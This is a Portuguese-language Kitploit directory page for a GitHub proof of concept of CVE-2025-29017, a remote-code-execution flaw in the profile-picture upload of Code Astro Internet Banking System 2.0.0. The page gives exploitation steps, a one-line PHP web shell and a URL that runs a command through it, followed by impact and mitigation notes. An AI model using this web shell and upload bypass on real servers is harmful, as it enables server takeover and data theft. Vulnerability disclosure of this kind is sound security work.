Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-29017 | Kitploit
Ferramentas/GitHubGitHub/b1tm4r/cve-2025-29017
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubb1tm4r/cve-2025-29017

CVE-2025-29017

Ver Repositório
1há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-29017 - Internet Banking System 2.0.0 Execução Remota de Código através do Upload de Foto de Perfil

Descrição

Uma vulnerabilidade de Execução Remota de Código (RCE) existe no Code Astro Internet Banking System 2.0.0 devido à validação inadequada de upload de arquivos no parâmetro profile_pic dentro de pages_view_client.php. Atacantes podem contornar as verificações de segurança modificando a requisição de upload, levando à execução arbitrária de código.

Componente Afetado

  • Parâmetro profile_pic em pages_view_client.php
  • A função de upload permite execução de arquivo PHP malicioso

Passos de Exploração

  1. Navegue até as configurações do perfil do usuário e procure por uma nova foto de perfil.



  1. Intercepte a requisição de upload da foto de perfil usando uma ferramenta como Burp Suite.


  1. Modifique o arquivo para dupla extensão (.jpeg.php), altere o cabeçalho Content-Type para application/x-php e anexe código PHP malicioso:
root@kitploit:~
<?php system($_GET['cmd']); ?>



  1. Você pode verificar se o arquivo foi enviado em /admin/dist/img/:
root@kitploit:~
http://IP:PORT/InternetBanking-php/admin/dist/img/image.jpeg.php?cmd=type C:\Users\file.txt


Impacto

  • Comprometimento Total do Servidor
  • Roubo de Dados
  • Escalonamento de Privilégios

Mitigação

  • Restringir uploads de arquivos apenas a formatos de imagem e verificar os tipos MIME.
  • Sanitizar nomes de arquivos e bloquear arquivos que contenham código executável.
  • Armazenar arquivos enviados fora da raiz web.

Referências

  • OWASP Segurança de Upload de Arquivos
Baixar ferramenta